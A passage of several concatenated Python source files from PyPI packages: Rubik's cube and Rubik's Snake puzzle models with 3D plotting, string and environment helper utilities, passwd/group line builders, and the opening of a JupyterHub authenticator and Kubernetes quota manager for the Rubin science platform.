            edges_to_swap = [2, 6, 10, 7]
            corners_to_swap = [15, 14, 18, 19]
        # LEFT
        elif turn == 5:
            edges_to_swap = [3, 7, 11, 4]
            corners_to_swap = [12, 15, 19, 16]
        else:
            print("Error: Invalid face to turn")
            return
        self.corner_turn(turn, corners_to_swap, way)
        self.edges_turn(turn, edges_to_swap, way)
    def n_pieces_in_place(self):
        """
        Counts how many pieces are in the correct place.
        :return: Number of pieces in the correct place.
        """
        return sum(np.all(self.pieces == pieces_ref, axis=1))
    def print(self):
        """
        Prints the state of the rubiks cube.
        :return: None.
        """
        for piece in self.pieces:
            print(piece)
    def scramble(self, scramble):
        """
        Scrambles the cube.
        :param scramble: String in official scramble notation.
        :return: None, the cube scrambles inplace.
        """
        turns = [notation[turn] for turn in scramble.split()]
        for turn in turns:
            self.turn_face(turn[0], turn[1])
    def get_pieces(self):
        """
        Returns pieces.
        :return: Pieces
        """
        return self.pieces
    def set_pieces(self, pieces):
        """
        Sets pieces (Doesn't check if the pieces are a valid cube,
        if it isn`t you might run into problems if you want it to be solvable."
        :param pieces: Pieces in the standard format
        :return: None
        """
        self.pieces = pieces
    def get_corners_orientation(self):
        """Return the orientation column (0/1/2) of the eight corner rows."""
        return self.pieces[12:, 1]
    def get_edges_orientation(self):
        """Return the orientation column (0/1) of the twelve edge rows."""
        return self.pieces[:12, 1]
    def set_edge(self, matrix, facelets, piece_num):
        """Derive one edge row (colour pair + orientation) from the colour
        matrix; the U/D (or, failing that, F/B) colour goes first, and the
        orientation bit records whether the facelets had to be swapped."""
        if matrix[facelets[0]] == colors[0] or matrix[facelets[1]] == colors[0] or \
                matrix[facelets[0]] == colors[3] or matrix[facelets[1]] == colors[3]:
            if matrix[facelets[0]] == colors[0] or matrix[facelets[0]] == colors[3]:
                self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[1]]
                self.pieces[piece_num][1] = 0
            else:
                self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[0]]
                self.pieces[piece_num][1] = 1
        else:
            if matrix[facelets[0]] == colors[1] or matrix[facelets[0]] == colors[4]:
                self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[1]]
                self.pieces[piece_num][1] = 0
            else:
                self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[0]]
                self.pieces[piece_num][1] = 1
    def set_corner(self, matrix, facelets, piece_num):
        """Derive one corner row (colour triple + orientation 0/1/2) from the
        colour matrix; orientation counts where the U/D colour sits among
        the three facelets."""
        # NOTE(review): debug print left in; consider removing.
        print(matrix[facelets[0]] + matrix[facelets[1]] + matrix[facelets[2]])
        if matrix[facelets[0]] == colors[0] or matrix[facelets[0]] == colors[3]:
            self.pieces[piece_num][1] = 0
            if matrix[facelets[1]] == colors[1] or matrix[facelets[1]] == colors[4]:
                self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[1]] + matrix[facelets[2]]
            else:
                self.pieces[piece_num][0] = matrix[facelets[0]] + matrix[facelets[2]] + matrix[facelets[1]]
        elif matrix[facelets[1]] == colors[0] or matrix[facelets[1]] == colors[3]:
            self.pieces[piece_num][1] = 1
            if matrix[facelets[0]] == colors[1] or matrix[facelets[0]] == colors[4]:
                self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[0]] + matrix[facelets[2]]
            else:
                self.pieces[piece_num][0] = matrix[facelets[1]] + matrix[facelets[2]] + matrix[facelets[0]]
        else:
            self.pieces[piece_num][1] = 2
            if matrix[facelets[0]] == colors[1] or matrix[facelets[0]] == colors[4]:
                self.pieces[piece_num][0] = matrix[facelets[2]] + matrix[facelets[0]] + matrix[facelets[1]]
            else:
                self.pieces[piece_num][0] = matrix[facelets[2]] + matrix[facelets[1]] + matrix[facelets[0]]
    def set_pieces_from_matrix(self, matrix):
        """Rebuild every edge and corner row from a 6x9 colour matrix."""
        # Set edges
        self.set_edge(matrix, [(0, 1), (1, 3)], 0)  # UF
        self.set_edge(matrix, [(0, 2), (2, 4)], 1)  # UR
        self.set_edge(matrix, [(0, 3), (4, 1)], 2)  # UB
        self.set_edge(matrix, [(0, 4), (5, 2)], 3)  # UL
        self.set_edge(matrix, [(1, 4), (5, 1)], 4)  # FL
        self.set_edge(matrix, [(1, 2), (2, 1)], 5)  # FR
        self.set_edge(matrix, [(4, 2), (2, 3)], 6)  # BR
        self.set_edge(matrix, [(4, 4), (5, 3)], 7)  # BL
        self.set_edge(matrix, [(3, 1), (1, 1)], 8)  # DF
        self.set_edge(matrix, [(3, 4), (2, 2)], 9)  # DR
        self.set_edge(matrix, [(3, 3), (4, 3)], 10)  # DB
        self.set_edge(matrix, [(3, 2), (5, 4)], 11)  # DL
        # Set corners
        self.set_corner(matrix, [(0, 5), (1, 8), (5, 6)], 12)  # UFL
        self.set_corner(matrix, [(0, 6), (1, 7), (2, 5)], 13)  # UFR
        self.set_corner(matrix, [(0, 7), (4, 6), (2, 8)], 14)  # UBR
        self.set_corner(matrix, [(0, 8), (4, 5), (5, 7)], 15)  # UBL
        self.set_corner(matrix, [(3, 6), (1, 5), (5, 5)], 16)  # DFL
        self.set_corner(matrix, [(3, 5), (1, 6), (2, 6)], 17)  # DFR
        self.set_corner(matrix, [(3, 8), (4, 7), (2, 7)], 18)  # DBR
self.set_corner(matrix, [(3, 7), (4, 8), (5, 8)], 19) # DBL | /rubiks_cube-1.0.7.tar.gz/rubiks_cube-1.0.7/rubiks_cube/cubie_cube.py | 0.667039 | 0.538983 | cubie_cube.py | pypi |
import re
import numpy as np
from itertools import product, combinations
def cosine(u, v):
    """Cosine distance between vectors *u* and *v* (1 - cosine similarity).

    Pure-NumPy stand-in for ``scipy.spatial.distance.cosine``.
    """
    similarity = np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))
    return 1 - similarity
class RubiksSnake:
    """Model, visualize and study the Rubik's Snake twisty puzzle.

    ``state`` holds one rotation value (0-3) per joint between adjacent
    segments; ``conformation`` holds six integer lattice points per
    segment describing its prism geometry (see ``compute_conformation``).
    """
    # Six reference points describe each segment's prism.
    POINTS_PER_UNIT = 6
    # Triangles used for the side faces of one segment in the mesh.
    TRIANGLES_PER_UNIT = 4
    # Plotly-style colorscale: alternating blue/white segments by default.
    DEFAULT_COLORS = [
        [0, 'blue'],
        [1, 'white'],
    ]
    def __init__(self, n_segments=24, color_scale=DEFAULT_COLORS, segment_colors=None, initial_state=None):
        '''
        Class for modeling, visualizing and studying the Rubik's Snake.

        :param n_segments: number of prism segments (24 for the classic snake).
        :param color_scale: plotly colorscale used when rendering.
        :param segment_colors: optional per-segment colour indices; defaults
            to alternating 0/1.
        :param initial_state: optional formula string (see
            ``assemble_by_formula``); when omitted the snake starts straight.
        '''
        self.n_segments = n_segments
        self.state = np.zeros(n_segments - 1, dtype=np.uint8)
        self.conformation = np.zeros((n_segments, 6, 3), dtype=np.int16)
        self.color_scale = color_scale
        if segment_colors is None:
            self.colors = np.tile([0,1], n_segments // 2)[:n_segments]
        else:
            self.colors = np.array(segment_colors)
        if initial_state is None:
            self.compute_conformation()
        else:
            self.assemble_by_formula(initial_state)
    def interference_check(self):
        """Detect self-intersections between segments.

        Buckets segments into unit grid cells (two segments sharing a cell
        are only compatible when their ridges are (anti)collinear and far
        enough apart).  Stores the offending segment groups in
        ``self.interferences`` and returns True when any exist.
        """
        # One representative lattice cell per segment (min corner of its points).
        cells = self.conformation.min(axis=1)
        lower_bounds = cells.min(axis=0)
        grid_shape = cells.max(axis=0) - lower_bounds + 1
        grid = -np.ones(grid_shape, dtype=np.int16)
        interference_candidates = {}
        for i in range(cells.shape[0]):
            x, y, z = cells[i] - lower_bounds
            if grid[x, y, z] >= 0:
                interference_candidates[(x, y, z)] = interference_candidates.get((x, y, z), [grid[x, y, z]]) + [i]
            else:
                grid[x, y, z] = i
        interferences = []
        for points in interference_candidates.values():
            if len(points) > 2:
                # Three or more segments in one cell always collide.
                interferences.append(points)
                continue
            a, b = points
            p2a, p3a = self.conformation[a, [2,3]]
            p2b, p3b = self.conformation[b, [2,3]]
            ridge_a, ridge_b = p3a - p2a, p3b - p2b
            is_collinear = (ridge_a == ridge_b).all()
            is_anticollinear = (ridge_a == -ridge_b).all()
            if not (is_collinear or is_anticollinear):
                interferences.append(points)
                continue
            if ((is_collinear and np.abs(p2a - p2b).sum() < 2)
                    or (is_anticollinear and np.abs(p2a - p3b).sum() < 2)):
                interferences.append(points)
        self.interferences = interferences
        return bool(interferences)
    def assemble_by_formula(self, formula):
        """Set joint rotations from a formula like ``"1R1-2L3"``.

        Each dash-separated unit is ``<segment><R|L><rotation>``; R sets the
        joint after the segment directly, L sets the previous joint with the
        rotation negated mod 4.
        """
        formula_unit = re.compile(r'(\d+)([RL])(\d)')
        formula_parsed = [formula_unit.match(unit).groups() for unit in formula.split('-')]
        for segment, side, rotation in formula_parsed:
            segment, rotation = map(int, (segment, rotation))
            i = (segment - 1) * 2
            if side == 'R':
                self.state[i] = rotation
            elif side == 'L':
                self.state[i-1] = -rotation % 4
        self.compute_conformation()
    def compute_conformation(self):
        """Propagate the six reference points of every segment from the
        fixed first segment, applying each joint's rotation (0-3) in turn.
        Prints a warning when the result self-intersects."""
        self.conformation[0] = [
            [0, 0, 1],
            [0, 1, 1],
            [1, 0, 1],
            [1, 1, 1],
            [1, 0, 0],
            [1, 1, 0],
        ]
        for i in range(self.n_segments - 1):
            p0, p1, p2, p3, p4, p5 = self.conformation[i]  # prev state
            offset = p2 - p4
            # Each branch is one of the four joint rotations; the next
            # segment's points are permutations/translations of the previous.
            if self.state[i] == 0:
                self.conformation[i+1] = [
                    p1 + offset,
                    p0 + offset,
                    p1,
                    p0,
                    p3,
                    p2,
                ]
            elif self.state[i] == 1:
                self.conformation[i+1] = [
                    p3 + offset,
                    p1 + offset,
                    p3,
                    p1,
                    p2,
                    p0,
                ]
            elif self.state[i] == 2:
                self.conformation[i+1] = [
                    p2 + offset,
                    p3 + offset,
                    p2,
                    p3,
                    p0,
                    p1,
                ]
            elif self.state[i] == 3:
                self.conformation[i+1] = [
                    p0 + offset,
                    p2 + offset,
                    p0,
                    p2,
                    p1,
                    p3,
                ]
            else:
                raise Exception
        if self.interference_check():
            print(f'WARNING! Self-intersection detected between segments {self.interferences}')
    def get_triangulation(self):
        """Return ``(points, triangles)`` for a triangle mesh of the whole
        snake: four side triangles per segment plus end caps."""
        triangles_per_unit = self.TRIANGLES_PER_UNIT
        points_per_unit = self.POINTS_PER_UNIT
        unit_triangles = np.array([
            [0, 2, 4],
            [1, 3, 5],
            [0, 1, 4],
            [1, 4, 5],
        ], dtype=np.uint16)
        unit_cap_start = np.array([
            [2, 3, 4],
            [3, 4, 5],
        ], dtype=np.uint16)
        unit_cap_end = np.array([
            [0, 1, 2],
            [1, 2, 3],
        ], dtype=np.uint16)
        assert unit_triangles.shape[0] == triangles_per_unit
        triangles = []
        for i in range(self.n_segments):
            triangles.append(unit_triangles + i*points_per_unit)
        triangles.append(unit_cap_start)
        triangles.append(unit_cap_end + i*points_per_unit)
        return self.conformation.reshape(-1,3), np.vstack(triangles)
    def get_intersecting_volume(self, i, j):
        """Compute the overlap solid of two interfering segments *i* and *j*.

        Classifies the overlap by the cosine distance between the segments'
        plane normals (0: full match, 0.5: big prism, 1: "roof" shape,
        1.5: small prism, 2: no intersection) and returns
        ``(points, triangles, edge_polyline)`` -- all None when disjoint.
        """
        def get_plane_norm(unit):
            # Normal of the segment's slanted face (ridge x visor).
            p0, p1, p2, p3, p4, p5 = unit.astype(np.float64)
            ridge = p3 - p2
            visor = p4 - p0
            plane_norm = np.cross(ridge, visor)
            return plane_norm
        def get_horns(unit):
            # Normals of the two sloped side faces adjacent to the ridge.
            p0, p1, p2, p3, p4, p5 = unit.astype(np.float64)
            ridge = p3 - p2
            slope_1, slope_2 = p0 - p2, p2 - p4
            return np.cross(ridge, slope_1), np.cross(ridge, slope_2)
        norm_i, norm_j = get_plane_norm(self.conformation[i]), get_plane_norm(self.conformation[j])
        interference_type = cosine(norm_i, norm_j)
        if np.isclose(interference_type, 0.0):  # full match cos_nn = 0
            intersection = self.conformation[i]
            unit_triangles = np.array([
                [0, 2, 4],
                [1, 3, 5],
                [0, 1, 4],
                [1, 4, 5],
                [0, 1, 2],
                [1, 2, 3],
                [2, 3, 4],
                [3, 4, 5],
            ], dtype=np.uint16)
            edge_bypass = [0, 1, 3, 2, 0, 4, 5, 1, 3, 5, 4, 2]
            edges = intersection[edge_bypass]
        elif np.isclose(interference_type, 0.5):  # big prism cos_nn = 0.5
            horns_i = get_horns(self.conformation[i])
            horns_j = get_horns(self.conformation[j])
            # Find the pair of parallel sloped faces, then pick the shared apex.
            for n, m in product((0, 1), (0, 1)):
                if np.isclose(cosine(horns_i[n], horns_j[m]), 0):
                    break
            if n == 0:
                bottom = self.conformation[i, :4]
                p4i, p5i = self.conformation[i, 4:]
                if m == 0:
                    p4j, p5j = self.conformation[j, 4:]
                    vertex = p4i if np.isclose(p4i, p5j).all() else p5i
                else:
                    p0j, p1j = self.conformation[j, :2]
                    vertex = p4i if np.isclose(p4i, p0j).all() else p5i
            else:
                bottom = self.conformation[i, 2:]
                p0i, p1i = self.conformation[i, :2]
                if m == 0:
                    p4j, p5j = self.conformation[j, 4:]
                    vertex = p0i if np.isclose(p0i, p5j).all() else p1i
                else:
                    p0j, p1j = self.conformation[j, :2]
                    vertex = p0i if np.isclose(p0i, p1j).all() else p1i
            (p0, p1, p2, p3), p4 = bottom, vertex
            intersection = np.vstack((p0, p1, p2, p3, p4))
            unit_triangles = np.array([
                [0, 1, 2],
                [1, 2, 3],
                [0, 1, 4],
                [1, 3, 4],
                [2, 3, 4],
                [0, 2, 4],
            ], dtype=np.uint16)
            edge_bypass = [0, 1, 3, 2, 0, 4, 2, 3, 4, 1]
            edges = intersection[edge_bypass]
        elif np.isclose(interference_type, 1.0):  # "roof" (extra points required) cos_nn = 1
            vert_1 = self.conformation[i, 2] + norm_i/2
            vert_2 = self.conformation[i, 3] + norm_i/2
            horns_i = get_horns(self.conformation[i])
            horns_j = get_horns(self.conformation[j])
            for n, m in product((0, 1), (0, 1)):
                if np.isclose(cosine(horns_i[n], horns_j[m]), 0):
                    break
            if n == 0:
                bottom = self.conformation[i, :4]
            else:
                bottom = self.conformation[i, 2:]
            (p0, p1, p2, p3), p4, p5 = bottom, vert_1, vert_2
            intersection = np.vstack((p0, p1, p2, p3, p4, p5))
            unit_triangles = np.array([
                [0, 2, 4],
                [1, 3, 5],
                [0, 1, 4],
                [1, 4, 5],
                [0, 1, 2],
                [1, 2, 3],
                [2, 3, 4],
                [3, 4, 5],
            ], dtype=np.uint16)
            edge_bypass = [0, 1, 3, 2, 0, 4, 5, 1, 3, 5, 4, 2]
            edges = intersection[edge_bypass]
        elif np.isclose(interference_type, 1.5):  # small prism cos_nn = 1.5
            p0i, p1i, p2i, p3i, p4i, p5i = self.conformation[i]
            ridge_i = p3i - p2i, p2i - p3i
            vert_ax_i = p3i - p5i
            horns_j = get_horns(self.conformation[j])
            for n, m in product((0, 1), (0, 1)):
                if np.isclose(cosine(ridge_i[n], horns_j[m]), 0):
                    break
            m = (m + 1) % 2
            cos_dist = cosine(vert_ax_i, horns_j[m])
            if n == 0:
                if np.isclose(cos_dist, 1):
                    p0, p1, p2, p3 = p1i, p3i, p5i, p0i
                elif np.isclose(cos_dist, 2):
                    p0, p1, p2, p3 = p1i, p3i, p5i, p4i
                else:
                    raise Exception
            else:
                if np.isclose(cos_dist, 1):
                    p0, p1, p2, p3 = p0i, p2i, p4i, p1i
                elif np.isclose(cos_dist, 2):
                    p0, p1, p2, p3 = p0i, p2i, p4i, p5i
                else:
                    raise Exception
            intersection = np.vstack((p0, p1, p2, p3))
            unit_triangles = np.array([
                [0, 1, 2],
                [0, 1, 3],
                [1, 2, 3],
                [0, 2, 3],
            ], dtype=np.uint16)
            edge_bypass = [0, 1, 2, 0, 3, 1, 2, 3]
            edges = intersection[edge_bypass]
        elif np.isclose(interference_type, 2.0):  # no intersection cos_nn = 2
            return None, None, None
        else:
            raise Exception
        return intersection, unit_triangles, edges
    def get_edges(self):
        """Return each segment's outline as a polyline of its points,
        transposed to (3, n) for plotting."""
        edge_bypass = [0, 1, 3, 2, 0, 4, 5, 1, 3, 5, 4, 2]
        edges = [unit[edge_bypass].T for unit in self.conformation]
        return edges
    def get_triangle_colors(self):
        """Return one colour index per mesh triangle (segment colours
        repeated per side triangle, plus cap colours)."""
        colors = np.tile(self.colors, (self.TRIANGLES_PER_UNIT,1)).T.flatten()
        cap_colors = [self.colors[0]]*2 + [self.colors[-1]]*2
        return np.hstack((colors, cap_colors))
    def get_plot_ranges(self):
        """Return cubic (x, y, z) axis ranges centred on the snake."""
        DELTA = 0.2
        coords = self.conformation.reshape(-1,3)
        min_c = coords.min(axis=0)
        max_c = coords.max(axis=0)
        mean_c = (max_c + min_c) / 2
        max_range = (max_c - min_c).max() + DELTA
        lower_bounds = mean_c - max_range/2
        upper_bounds = mean_c + max_range/2
        return np.vstack((lower_bounds, upper_bounds)).T
    def plot_3d(self, figsize=(800, 800),
                allow_self_intersection=True,
                visualize_interferences=True,
                background_color='LightSteelBlue'):
        """Render the snake with plotly (imported lazily).

        Self-intersecting snakes are drawn translucent; with
        ``visualize_interferences`` the overlap solids are highlighted in
        pink.  Returns without drawing when ``allow_self_intersection`` is
        False and interferences exist.
        """
        if not allow_self_intersection and self.interferences:
            return
        import plotly.graph_objects as go
        coordinates, triangles = self.get_triangulation()
        x, y, z = coordinates.T
        i, j, k = triangles.T
        mesh3d = go.Mesh3d(
            x=x, y=y, z=z,
            i=i, j=j, k=k,
            colorscale=self.color_scale,
            intensity=self.get_triangle_colors(),
            intensitymode='cell',
            opacity=1 if not self.interferences else 0.5,
            showscale=False,
        )
        mesh3d_intersections = []
        if visualize_interferences:
            for units in self.interferences:
                for i, j in combinations(units, 2):
                    coordinates, triangles, edges = self.get_intersecting_volume(i, j)
                    if coordinates is None:
                        continue
                    x, y, z = coordinates.T
                    i, j, k = triangles.T
                    mesh3d_intersections.append(go.Mesh3d(
                        x=x, y=y, z=z,
                        i=i, j=j, k=k,
                        color='lightpink',
                        opacity=0.9,
                    ))
                    x, y, z = edges.T
                    mesh3d_intersections.append(go.Scatter3d(
                        x=x, y=y, z=z,
                        mode='lines',
                        name='',
                        line=dict(color='red', width=8),
                    ))
        lines = [go.Scatter3d(
            x=x, y=y, z=z,
            mode='lines',
            name='',
            line=dict(color='black', width=8),
        ) for x, y, z in self.get_edges()]
        fig = go.Figure(data=[mesh3d] + lines + mesh3d_intersections)
        x_range, y_range, z_range = self.get_plot_ranges()
        width, height = figsize
        fig.update_layout(
            autosize=False,
            width=width,
            height=height,
            margin=dict(
                l=0,
                r=0,
                b=0,
                t=0,
            ),
            scene = dict(
                xaxis = dict(visible=False, range=x_range),
                yaxis = dict(visible=False, range=y_range),
                zaxis = dict(visible=False, range=z_range),
            ),
            showlegend=False,
            scene_aspectmode='cube',
            paper_bgcolor=background_color,
        )
fig.show(config={'displaylogo': False}) | /rubiks_snake-0.1.3.tar.gz/rubiks_snake-0.1.3/rubiks_snake.py | 0.490968 | 0.397938 | rubiks_snake.py | pypi |
import hashlib
from collections import defaultdict
def rreplace(s, old, new, occurrence):
    """Replace the last *occurrence* instances of *old* in *s* with *new*.

    Splits from the right and rejoins with the replacement, so only the
    trailing matches are substituted.  Adapted from:
    https://stackoverflow.com/questions/2556108/\
rreplace-how-to-replace-the-last-occurrence-of-an-expression-in-a-string
    """
    return new.join(s.rsplit(old, occurrence))
def str_bool(s):
    """Make a sane guess for whether a value represents true or false.

    Intended for strings, mostly in the context of environment variables,
    but if you pass it something that's not a string that is falsy, like
    an empty list, it will cheerfully return False.
    """
    if not s:
        return False
    if not isinstance(s, str):
        # Truthy and not a string: call it True.
        # (isinstance, unlike the old ``type(s) != str`` check, also
        # inspects str subclasses instead of blindly returning True.)
        return True
    return s.lower() not in {"false", "0", "no", "n"}
def str_true(v):
    """The string representation of a true value will be 'TRUE'.  False
    will be the empty string.
    """
    return "TRUE" if v else ""
def listify(item, delimiter=","):
    """Turn a delimiter-separated string into an actual list.

    Useful for environment parsing: ``None`` or any falsy value returns
    the empty list, a string is split on *delimiter*, and a list passes
    through unchanged.

    Raises
    ------
    TypeError
        If *item* is truthy but neither a string nor a list.
    """
    if not item:
        return []
    # isinstance (rather than ``type(item) is str``) also accepts str/list
    # subclasses, which behave correctly here.
    if isinstance(item, str):
        return item.split(delimiter)
    if not isinstance(item, list):
        raise TypeError("'listify' must take None, str, or list!")
    return item
def floatify(item, default=0.0):
    """Another environment-parser: the empty string should be treated as
    None, and return the default, rather than the empty string (which
    does not become an integer).  Default can be either a float or string
    that float() works on.  Note that numeric zero (or string '0') returns
    0.0, not the default.  This is intentional.
    """
    if item is None or item == "":
        return default
    return float(item)
def intify(item, default=0):
    """Integer-returning counterpart of :func:`floatify`.

    None and the empty string map to *default*; anything else is coerced
    through float and truncated toward zero.
    """
    as_float = floatify(item, default)
    return int(as_float)
def list_duplicates(seq):
    """Yield ``(item, positions)`` pairs for items appearing more than once.

    Based on https://stackoverflow.com/questions/5419204
    """
    positions = defaultdict(list)
    for index, item in enumerate(seq):
        positions[item].append(index)
    return (
        (item, locs) for item, locs in positions.items() if len(locs) > 1
    )
def list_digest(inp_list):
    """Return a SHA-256 hex digest uniquely identifying *inp_list*.

    Raises
    ------
    TypeError
        If the input is not a list.
    ValueError
        If the input list is empty.
    """
    if type(inp_list) is not list:
        raise TypeError("list_digest only works on lists!")
    if not inp_list:
        raise ValueError("input must be a non-empty list!")
    # shlex.join (py >= 3.8) would be safer against delimiter collisions,
    # but switching would change existing digests; keep the space join.
    joined = " ".join(inp_list)
    return hashlib.sha256(joined.encode("utf-8")).hexdigest()
import hashlib
def get_fake_gid(grpname):
    """Deterministically fabricate a GID for a group with no Unix GID.

    Use if we have strict_ldap_groups off, to assign GIDs to names with
    no matching Unix GID.  The value is a hash of the group name, modulo
    a large-ish range, added to a large-ish base, so it is consistent
    across calls.  Collisions are possible but don't really matter.

    We keep the no-GID groups around because they may feed options-form
    or quota decisions (turn on strict_ldap_groups if they don't).
    """
    base = 3e7
    span = 1e7
    digest = hashlib.sha256(grpname.encode("utf-8")).hexdigest()
    return int(base + (int(digest, 16) % span))
def make_passwd_line(claims):
    """Build a newline-terminated /etc/passwd entry from token *claims*.

    Uses the claim's ``uid`` (user name) and ``uidNumber``; the private
    group GID equals the UID.
    """
    uname = claims["uid"]
    uid = claims["uidNumber"]
    return f"{uname}:x:{uid}:{uid}::/home/{uname}:/bin/bash\n"
def assemble_gids(claims, strict_ldap=False):
    """Return a ``name:gid,name:gid,...`` string for provisioning the
    user and groups (in sudo mode) from the claims data.
    """
    pairs = _map_supplemental_gids(claims, strict_ldap=strict_ldap)
    return ",".join("{}:{}".format(name, gid) for name, gid in pairs)
def make_group_lines(claims, strict_ldap=False):
    """Build newline-terminated strings suitable for appending to
    /etc/group for this user.
    """
    uname = claims["uid"]
    uid = claims["uidNumber"]
    # Private group first; the user is not listed as a member because
    # membership is implicit via the passwd entry's GID.
    lines = ["{}:x:{}:\n".format(uname, uid)]
    for gname, gid in _map_supplemental_gids(claims, strict_ldap=strict_ldap):
        lines.append("{}:x:{}:{}\n".format(gname, gid, uname))
    return lines
def get_supplemental_gids(claims, strict_ldap=False):
    """Return the list of supplemental GIDs the container can run with
    (sudoless mode).
    """
    return [
        gid
        for _, gid in _map_supplemental_gids(claims, strict_ldap=strict_ldap)
    ]
def resolve_groups(claims, strict_ldap=False):
    """Return a groupmap suitable for insertion into auth_state; group
    values are strings.
    """
    return {
        name: str(gid)
        for name, gid in _map_supplemental_gids(
            claims, strict_ldap=strict_ldap
        )
    }
def _map_supplemental_gids(claims, strict_ldap=False):
    """Return ``(groupname, gid)`` tuples derived from the user's group
    claims.

    Groups whose claim carries no ``id`` are dropped when *strict_ldap*
    is True and otherwise assigned a synthetic GID via
    :func:`get_fake_gid`.
    """
    uname = claims["uid"]
    result = []
    for group in claims["isMemberOf"]:
        gname = group["name"]
        if gname == uname:
            # The private group is already covered by runAsGid.
            continue
        gid = group.get("id", None)
        if not gid and not strict_ldap:
            gid = get_fake_gid(gname)
        if gid:
            result.append((gname, gid))
    return result
def add_user_to_groups(uname, grpstr, groups=("lsst_lcl", "jovyan")):
    """Inject a user into selected groups of an /etc/group-style string.

    Parameters
    ----------
    uname : str
        User name to add.
    grpstr : str
        Contents of a base group file.
    groups : sequence of str
        Names of the groups the user should be added to (defaults to
        'lsst_lcl' and 'jovyan').

    Returns
    -------
    str
        The updated group file contents; each non-empty input line is
        stripped and newline-terminated.
    """
    # Immutable tuple default replaces the old mutable-list default
    # argument; membership tests behave identically.
    out_lines = []
    for raw_line in grpstr.split("\n"):
        line = raw_line.strip()
        if not line:
            continue
        grpname = line.split(":")[0]
        if grpname in groups:
            # Append the user, preceded by a comma only when the group
            # already has members.
            line += uname if line.endswith(":") else "," + uname
        out_lines.append(line + "\n")
    # join() instead of repeated string concatenation (was quadratic).
    return "".join(out_lines)
import asyncio # noqa: F401 (We do indeed use an async def)
import json
from eliot import start_action
from jupyterhub.auth import Authenticator
from .. import RubinMiddleManager
from rubin_jupyter_utils.config import RubinConfig
class RubinAuthenticator(Authenticator):
    """We create a Rubin Manager structure on startup; this is a
    RubinMiddleManager controlling a set of other managers: auth, env,
    namespace, quota, and volume.
    All RubinAuthenticator subclasses are expected to create two new fields in
    auth_state:
    * auth_state['group_map'], which contains a dict mapping group name
      (the key) to a group ID number (the value). GIDs may be strings or
      integers.
    * auth_state['uid'], which contains a string or an integer with the
      user's numeric UID.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Delegating manager tree holding the Rubin-specific sub-managers
        # (env, namespace, options form, quota, volume) and configuration.
        self.rubin_mgr = RubinMiddleManager(
            parent=self, authenticator=self, config=RubinConfig()
        )
        # Persist auth_state so spawners can read group_map/uid later.
        self.enable_auth_state = True
        # Drop hub users whose upstream authentication no longer validates.
        self.delete_invalid_users = True
        # Auth token; populated elsewhere (subclass or login flow).
        self.token = None

    def dump(self):
        """Return dict suitable for pretty-printing."""
        ad = {
            "enable_auth_state": self.enable_auth_state,
            "delete_invalid_users": self.delete_invalid_users,
            "login_handler": str(self.login_handler),
            "rubin_mgr": self.rubin_mgr.dump(),
        }
        return ad

    def toJSON(self):
        """Serialize dump() output as a JSON string."""
        return json.dumps(self.dump())

    async def refresh_user(self, user, handler=None):
        """On each refresh_user, clear the options form cache, thus
        forcing it to be rebuilt on next display. Otherwise it is built once
        per user session, which is not frequent enough to display new images
        in a timely fashion.
        """
        with start_action(action_type="refresh_user_rubinauth"):
            uname = user.escaped_name
            self.log.debug(
                "Entering Rubin auth refresh_user for '{}'.".format(uname)
            )
            self.log.debug("Calling superclass's refresh_user().")
            retval = await super().refresh_user(user, handler)
            self.log.debug("Returned from superclass's refresh_user().")
            self.log.debug("Clearing form data for '{}'.".format(uname))
            # Dropping the cached form forces a rebuild (and thus a fresh
            # image list) on the next spawn-options display.
            self.rubin_mgr.optionsform_mgr.options_form_data = None
            self.log.debug(
                "Finished Rubin auth refresh_user for '{}'".format(uname)
            )
            return retval
import json
import os
from eliot import start_action
from kubernetes.client import V1ResourceQuotaSpec
from kubernetes.client.rest import ApiException
from kubernetes import client
from .. import LoggableChild
class RubinQuotaManager(LoggableChild):
    """Quota support for Rubin LSP Jupyterlab and Dask pods."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Computed quota ('hard' limits dict) set by
        # define_resource_quota_spec().
        self.quota = {}
        # Per-user overrides derived from the resource map file.
        self.custom_resources = {}
        # Parsed resource-map JSON (list of dicts), lazily loaded.
        self.resourcemap = None

    def define_resource_quota_spec(self):
        """We're going to return a resource quota spec that checks whether we
        have a custom resource map and uses that information. If we do not
        then we use the quota from our parent's config object.
        Note that you could get a lot fancier, and check the user group
        memberships to determine what class a user belonged to, or some other
        more-sophisticated-than-one-size-fits-all quota mechanism.
        """
        with start_action(action_type="define_resource_quota_spec"):
            self.log.debug("Calculating default resource quotas.")
            om = self.parent.optionsform_mgr
            sizemap = om.sizemap
            # sizemap is an ordered dict, and we want the last-inserted one,
            # which is the biggest
            big = list(sizemap.keys())[-1]
            cpu = sizemap[big]["cpu"]
            cfg = self.parent.config
            max_dask_workers = 0
            if cfg.allow_dask_spawn:
                max_dask_workers = cfg.max_dask_workers
            mem_per_cpu = cfg.mb_per_cpu
            # Budget covers the Lab pod itself plus all possible workers.
            total_cpu = (1 + max_dask_workers) * cpu
            total_mem = str(int(total_cpu * mem_per_cpu + 0.5)) + "Mi"
            total_cpu = str(int(total_cpu + 0.5))
            self.log.debug(
                "Default quota sizes: CPU %r, mem %r" % (total_cpu, total_mem)
            )
            self._set_custom_user_resources()
            if self.custom_resources:
                self.log.debug("Have custom resources.")
                cpuq = self.custom_resources.get("cpu_quota")
                if cpuq:
                    self.log.debug("Overriding CPU quota.")
                    total_cpu = str(cpuq)
                memq = self.custom_resources.get("mem_quota")
                if memq:
                    self.log.debug("Overriding memory quota.")
                    total_mem = str(memq) + "Mi"
            self.log.debug(
                "Determined quota sizes: CPU %r, mem %r"
                % (total_cpu, total_mem)
            )
            qs = V1ResourceQuotaSpec(
                hard={"limits.cpu": total_cpu, "limits.memory": total_mem}
            )
            self.quota = qs.hard

    def _set_custom_user_resources(self):
        """Create custom resource definitions for user.

        Scans the resource map for entries matching the user's name or
        any of their groups; the maximum of each matching field wins.
        """
        with start_action(action_type="_set_custom_user_resources"):
            if not self.resourcemap:
                self.log.debug("No resource map found; generating.")
                self._create_resource_map()
            if not self.resourcemap:
